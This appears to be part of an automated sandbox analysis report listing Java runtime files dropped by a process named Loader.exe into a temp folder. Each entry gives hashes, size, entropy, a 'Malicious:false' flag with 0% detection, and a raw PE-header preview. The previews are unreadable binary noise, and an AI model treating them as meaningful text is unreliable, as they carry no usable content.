                                                                                                                                                                                                                                                                                                              SSDEEP:1536:f6arRmcnq2lxm+Na6C7HIT6T8E2pLSSm3:fzm+q7HITS8E2pLSSA
                                                                                                                                                                                                                                                                                                              MD5:AEADA06201BB8F5416D5F934AAA29C87
                                                                                                                                                                                                                                                                                                              SHA1:35BB59FEBE946FB869E5DA6500AB3C32985D3930
                                                                                                                                                                                                                                                                                                              SHA-256:F8F0B1E283FD94BD87ABCA162E41AFB36DA219386B87B0F6A7E880E99073BDA3
                                                                                                                                                                                                                                                                                                              SHA-512:89BAD9D1115D030B98E49469275872FFF52D8E394FE3F240282696CF31BCCF0B87FF5A0E9A697A05BEFCFE9B24772D65ED73C5DBD168EED111700CAAD5808A78
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................I2.......(.......*.....................\.:.....\.>...............................)...............+.....Rich............PE..L...tPjW...........!.....r...V.......w.............m......................................@.........................@...x...............................@.......8.......................................@...............4............................text....p.......r.................. ..`.rdata...@.......B...v..............@..@.data...............................@....rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font_t2k.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):446528
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.603555069382601
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:RreTVhY4gXwLR4YS+OX3kQg4O5kM2LY58gwDTxXvwGSelo:Rr4VhyK7eTxXvwelo
                                                                                                                                                                                                                                                                                                              MD5:8AE40822B18B10494527CA3842F821D9
                                                                                                                                                                                                                                                                                                              SHA1:202DFFA7541AD0FAD4F0D30CEE8C13591DCA5271
                                                                                                                                                                                                                                                                                                              SHA-256:C9742396B80A2241CE5309C388B80000D0786A3CAB06A37990B7690FD0703634
                                                                                                                                                                                                                                                                                                              SHA-512:AA324A265639C67843B4BF6828029B413044CBE4D7F06A253B78B060EA554FECC6E803D59D03742C485B2EB3D52E5C0A44928DCC927501F413EE4664BB8A11F5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f.4Z..gZ..gZ..g.}g^..gWUggX..gWUeg\..gWUZgW..gWU[g_..g..qg]..gZ..g...g'~Zg~..g'~[g...g'~fg[..gWUag[..g'~dg[..gRichZ..g........PE..L...uPjW...........!..............................m......................................@.........................@..........d.......................@........%...................................\..@...............,............................text...{........................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_iio.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):126016
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.608910794554507
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:oOxjjADzd+aeaPB9JhjxkM2wzGdXJbD/jn8Y6:ocKzeaPB9JhjxknwzG5JbDb8F
                                                                                                                                                                                                                                                                                                              MD5:01706B7997730EAA9E2C3989A1847CA6
                                                                                                                                                                                                                                                                                                              SHA1:7CEAD73CBE94E824FA5E44429B27069384BFDB41
                                                                                                                                                                                                                                                                                                              SHA-256:20533C66C63DA6C2D4B66B315FFCF5C93AE5416E3DAE68CDD2047EFE7958AB3A
                                                                                                                                                                                                                                                                                                              SHA-512:3272C8DE6C32D53372D481441DA81AE2B6EA02E8360B23D7F793B24827BD683A6604F43BE18CE2BEE40038FBE7D5F7AF78B2C465A51F82478D881DBEB5744DC2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.r.*.r.*.r.*O..*.r.*.r.*.r.*. .*.r.*. .*.r.*. 0*.r.*. 1*.r.*..0*.r.*...*.r.*. .*.r.*...*.r.*Rich.r.*........PE..L...vPjW...........!.........:.....................m................................c.....@.....................................<.......................@.......\...................................0...@............................................text... ........................... ..`.rdata..8(.......*..................@..@.data...............................@....rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):191552
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.744419946343284
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:lScg0xvhTZNIs3Ft+STckCBQo3C0Y22vncTBfsO9jZqMN3cH1Tefqk:lSclI6nTc3BQo3C0YHncTBxvs65
                                                                                                                                                                                                                                                                                                              MD5:48C96771106DBDD5D42BBA3772E4B414
                                                                                                                                                                                                                                                                                                              SHA1:E84749B99EB491E40A62ED2E92E4D7A790D09273
                                                                                                                                                                                                                                                                                                              SHA-256:A96D26428942065411B1B32811AFD4C5557C21F1D9430F3696AA2BA4C4AC5F22
                                                                                                                                                                                                                                                                                                              SHA-512:9F891C787EB8CEED30A4E16D8E54208FA9B19F72EEEC55B9F12D30DC8B63E5A798A16B1CCC8CEA3E986191822C4D37AEDB556E534D2EB24E4A02259555D56A2C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v...%...%...%..w%...%.7D%...%.7q%...%..|%...%...%...%.7E%*..%.7u%...%.7r%...%Rich...%........................PE..L....DjW.....................(...................@..........................0............@.................................\*..d.......................@............................................$..@............................................text............................... ..`.rdata...t.......v..................@..@.data....4...@......."..............@....rsrc................8..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaws.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):269888
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.418120581797452
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:Fp9B0qT85g5Sq+VBY2qVLC2wH5rM8HoQvlHO:5uqT85sSq+ERVm2wZEQvlHO
                                                                                                                                                                                                                                                                                                              MD5:F8211DB97BF852C3292C3E9C710C19D9
                                                                                                                                                                                                                                                                                                              SHA1:46DAD07779E030D8D1214AFE11C4526D9F084051
                                                                                                                                                                                                                                                                                                              SHA-256:ECF4307739CA93F1569CE49377A28B31FE1EB0F44B6950DBAAFA1925B24C9752
                                                                                                                                                                                                                                                                                                              SHA-512:B3E20EECA87136CAE77F06E4149E65EBFEF71A43589F7E2833008FE43811A2BC8B6202B6ADB5CE122A1822E83CE226B833DEF93A2B161476BD5B623794E4F697
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..L%...%...%...>c..8...J.4.-...,.......%.......>c5.....>c4.....>c..$...>c..$...Rich%...................PE..L...rGjW.................t...........C............@..................................a....@.................................L...x.......................@.......8................................... ...@...............h...T........................text....r.......t.................. ..`.rdata...c.......d...x..............@..@.data...8........z..................@....rsrc................V..............@..@.reloc..>-..........................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jawt.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13888
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.274978807671468
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:ahKnvndLwm3XLPVlD6yTUZnYe+PjPriT0fwdNJLkoRz:a4j7PVl1TAnYPLr7cLka
                                                                                                                                                                                                                                                                                                              MD5:0291BA5765EE11F36C0040B1F6E821FB
                                                                                                                                                                                                                                                                                                              SHA1:FFE1DCF575CCD0374DF005E9B01D89F6D7095833
                                                                                                                                                                                                                                                                                                              SHA-256:F8540BE2BBD5BDE7962D2FE4E7EC9EF9BF53D95B48781AE549AA792F10032485
                                                                                                                                                                                                                                                                                                              SHA-512:72ADDC631D8CF064E1B047B51EEF7F306CA959D24ED705065C33EE8DDDF7EA84B95B3DE5B0709015A81D36ACA01E15CE99A354D4069D4D798ED128A6A76D1010
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X"._9LR_9LR_9LRD..R^9LRD..RS9LRD..RZ9LRVA.R]9LR_9MR|9LRD..R\9LRD..R^9LRD..R^9LRD..R^9LRRich_9LR........PE..L...xPjW...........!......................... .....m.........................`............@..........................&..J...\"..P....@..................@....P..@.... ...............................!..@............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc..t....P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jdwp.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):163904
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.783788147675078
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:XrQPwE5tlGsXVomHvD+1febSICzqozXtrQwnNZkB+5:XU15tpX9HvsfrTtMwNWBY
                                                                                                                                                                                                                                                                                                              MD5:6E08D65F5CBB85E51010F36A84FC181D
                                                                                                                                                                                                                                                                                                              SHA1:4EEE8BE68BAAF6320AEA29131A1C0B322F09F087
                                                                                                                                                                                                                                                                                                              SHA-256:2D8658909D9E357A4B70FCF862D690EEC82A2F77161ABB021E0839C6A67D4825
                                                                                                                                                                                                                                                                                                              SHA-512:DF4494D062E9A8AC82D727D2722DCF32C3FC924FA104F384FA099ADB08ECBDEEA7A19245D779097C0AFCF51F84852328ED595C88380F42BD39560678C8AD9621
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#..cp..cp..cp...p..cp...p..cp.D.p..cp..bp..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cpRich..cp........................PE..L...{PjW...........!...............................m......................................@......................... ?..h...|9..<....P...............h..@....`...)..@...............................(8..@...............,............................text............................... ..`.rdata..._.......`..................@..@.data...0....@.......4..............@....rsrc........P.......8..............@..@.reloc...+...`...,...<..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfr.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):22592
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.620820751411794
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:YL4Z7lZRiY3PB6cGgOp2m1zq2oatSnPV5zYxkpLfsnYPLr7Ybc:E4PZRiY3PB6cVAebaMnd+ypLkC7Cc
                                                                                                                                                                                                                                                                                                              MD5:700F5789D2E7B14B2F5DE9FDB755762E
                                                                                                                                                                                                                                                                                                              SHA1:F35EDE3441D6E5461F507B65B78664A6C425E9AC
                                                                                                                                                                                                                                                                                                              SHA-256:D115EAF96BD41C7A46400DCFF7EF26AC99E3CF7A55A354855C86BAE5C69A895A
                                                                                                                                                                                                                                                                                                              SHA-512:664A442DD424CA04AC0CE072B9BBD5EF7C657B59A26403C44A856738F7998466BFE3010825A13451281841D39B0A34D8997EE24497D626EC60C19AA1AF0EE465
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W..W..W../j.W...e.W..W..W....a.W...g.W...R.W...S.W...b.W...c.W...d.W..Rich.W..........PE..L...|PjW...........!........."......T&.......0.....m.................................O....@.........................`>.......:..<....`...............@..@....p.. ....0...............................9..@............0...............................text...^........................... ..`.rdata..p....0....... ..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxmedia.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):115264
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.588792190592223
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:2Cgsy+/cydqNiaZr+lOzZPh7/W4MCnc8Ioaa2yFWcC6vsx/8:FZOzZPh7/WSe+S6v+U
                                                                                                                                                                                                                                                                                                              MD5:8BC8FE64128F6D79863BC059D9CC0E2E
                                                                                                                                                                                                                                                                                                              SHA1:C1F2018F656D5500ACF8FA5C970E51A55004DA2E
                                                                                                                                                                                                                                                                                                              SHA-256:B77CD78FF90361E7F654983856EE9697FDC68A0F9081C06207B691B0C9AF1F5D
                                                                                                                                                                                                                                                                                                              SHA-512:6771F23ECF1A449EB6B0B394E0F1D3EB17C973FC0544BA25487C92F215ACC234FC31C9B7BE5528EFD06D29A35BB37DD7934318837576862ADFC2631B4D610A24
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l..>7..l..>...l..>5..l..>...l...#..l..5..l..l.zl.....l.....l..4..l..>3..l..6..l.Rich.l.........PE..L...}PjW...........!.........|......],.......@.....m................................~.....@.....................................x.......................@............................................h..@............@...............................text....-.......................... ..`.rdata..4Z...@...\...2..............@..@.data...4...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxwebkit.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):33934912
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.35314231534845
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:393216:VJ8d7SMzwH5R2sdDcBwHHdI4DKRlDsqXCagQZhzvilh2Wlq7ODI:VJ8d7zzUesdDtevn
                                                                                                                                                                                                                                                                                                              MD5:4D857A5FC9CA16D2A67872FACCF85D9F
                                                                                                                                                                                                                                                                                                              SHA1:EAEB632E526EFA946E4DB1B8CFA31DE6A7B03219
                                                                                                                                                                                                                                                                                                              SHA-256:7FFA7423DDA07499394B345E5ECE2D54C8E19247E6E76C0E23B5BF1470AB0D7F
                                                                                                                                                                                                                                                                                                              SHA-512:8DBC8675CE2DACE8D629C3FA66CF65704346AB829AE0B0A1D7B25BE22783B7E73624BA70F6D67264D6CA1656D7590E3753A8DF2227DA45112C5BD4A5654089AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........O..z!..z!..z!.c...z!..(...z!..(...z!......z!..z!..z!..(..hz!..(...z!......z!. ...z!..z ..{!......p!......z!..(...z!......z!.Rich.z!.................PE..L...~PjW...........!......... $....................m......................................@.................................X...x.......@...............@..............................................@............................................text.............................. ..`.rdata...E.......F..................@..@.data..............................@....unwante............................@..@.rsrc...@...........................@..@.reloc.............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jjs.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.475020301731584
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:GpsE5cnm6ObmSHhV8j0eeq4SziahnYPLr79OOu:Gpszn6iS/8jxeqfhC78Ou
                                                                                                                                                                                                                                                                                                              MD5:4F11D43AA2215CE771DA528878F01C8E
                                                                                                                                                                                                                                                                                                              SHA1:8062681D73489FF200CA0BA426FF1FF3F44494A7
                                                                                                                                                                                                                                                                                                              SHA-256:0D554CD4B373D6D9B9C179A468D179388706C0BDE4D878ED75EF575651588B3C
                                                                                                                                                                                                                                                                                                              SHA-512:34CB271C32FB479CFAEEC536A5D35A41730E90001D67DC9DB595DB240A1F58C3BF12334BB5CDE7673C8E56A4C272BFBD66E4EACDEE0082F6FD583E4E039EC540
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......C....@.................................$#..P....@..@............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...@....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jli.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):158784
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.816453355323999
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:gLkNbBRaz4rQWiG6wMz9/S3en9pHUw06TBfkqI44:rNbB4Mcnv7z6en9pj06TB6
                                                                                                                                                                                                                                                                                                              MD5:73A76EC257BD5574D9DB43DF2A3BB27F
                                                                                                                                                                                                                                                                                                              SHA1:2C9248EAE2F9F5F610F6A1DFD799B0598DA00368
                                                                                                                                                                                                                                                                                                              SHA-256:8F19B1BA9295F87E701C46CB888222BB7E79C6EE74B09237D3313E174AE0154F
                                                                                                                                                                                                                                                                                                              SHA-512:59ECD5FCF35745BDADCDB94456CB51BB7EA305647C164FE73D42E87F226528D1A53CE732F5EC64CE5B4581FA8A17CFBFDC8173E103AE862D6E92EB3AD3638518
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................6...........0.....=............7....5.....4.....3....Rich............PE..L....PjW...........!...............................o................................Y.....@..........................3..m....*..d....................T..@............................................#..@............................................text...~........................... ..`.rdata...u.......v..................@..@.data....4...@......."..............@....rsrc................6..............@..@.reloc.."............:..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2iexp.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):207424
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.630800216665857
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:ckZ5ktGCru8e6Y3RhNw0mjs+OBS7n7ACKRAHbW:ciIbS6Y37Nw0/QC
                                                                                                                                                                                                                                                                                                              MD5:475DD87198F9C48EFB08AAB4ADE8AF5A
                                                                                                                                                                                                                                                                                                              SHA1:9B657E0837639663D4D721F8C5E25401F11E7BEB
                                                                                                                                                                                                                                                                                                              SHA-256:32764005FCCE7D0E51801528F6B68C860979E08D027A5220DFEC19B2A8013354
                                                                                                                                                                                                                                                                                                              SHA-512:0B492B0FBADC14178A6F79A58E47C30D92B59B18414E38A7B119699D0788ACF3713F925CF0EC570BE3E29AB26BDB6B567C38526BC0603BA78ECC3E2952EA3E2B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.*...*...*.......*.......*.;....*.......*.......*...+...*.......*.......*.......*.......*.......*.......*.Rich..*.........................PE..L....PjW...........!.........>.....................o.........................P............@.............................................................@......../...................................C..@...............|...........................text.../........................... ..`.rdata..............................@..@.data....,.......&..................@....rsrc...............................@..@.reloc...6.......8..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):82496
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.597347722250847
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:ez2dfBusTTkMffX+xR5kdt94u+508AqDfJOqsbCkq24maADX:kE5u+kkX+P+dt9O08JJOZXX4nADX
                                                                                                                                                                                                                                                                                                              MD5:5F85F7F2DFAC397D642834B61809240F
                                                                                                                                                                                                                                                                                                              SHA1:ECA28E8464208FA11EF7DF677B741CDD561483D9
                                                                                                                                                                                                                                                                                                              SHA-256:B71E00ADB77D87882D58993A5888955BDD62C57D364F60AAA0FA19D32A69C9DA
                                                                                                                                                                                                                                                                                                              SHA-512:2BFE9FCE450E57EA93DEEAA85A746CB17BA946EEFF866F10D67C74F7EA038B16910E0D8EF29E9F358AF7DAABD45E3983C370FEF82A9647546819DCDE3AEE45BC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-..C..C..C.....C..3..C.v...C..3..C..B.X.C.....C..3..C..3...C..3..C..3..C.Rich.C.........PE..L....HjW............................1.............@.................................cE....@.................................\...x....`..H............*..@....p..h.......................................@............................................text............................... ..`.rdata...C.......D..................@..@.data....0... ......................@....rsrc...H....`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2native.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):19008
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.372096409611824
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:PTjlu57T5J5eFeYW7TPVlN3B+ASZQ4NNR7F3qnYPLr7om0:PnUd5eFeDfd5Sj7oC7om0
                                                                                                                                                                                                                                                                                                              MD5:4023E25F92B5F13E792901BF112A8EA2
                                                                                                                                                                                                                                                                                                              SHA1:31ADCD411905832B89EA55DEC8B9C83AF3C7D3EA
                                                                                                                                                                                                                                                                                                              SHA-256:432AEDAC59FA161FED5A5D95CA5F8CFD1D73A35ABE8A7090D137100F727B687B
                                                                                                                                                                                                                                                                                                              SHA-512:AD0E6F8071EB09E843989E637BACA988DD7706D84FC26DB7C2E18BBE03A78A6C5BFE4F1B28289B5929B2B86C53FB6C3DAE42523DC8EDE8057A8F431AEA77BB20
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
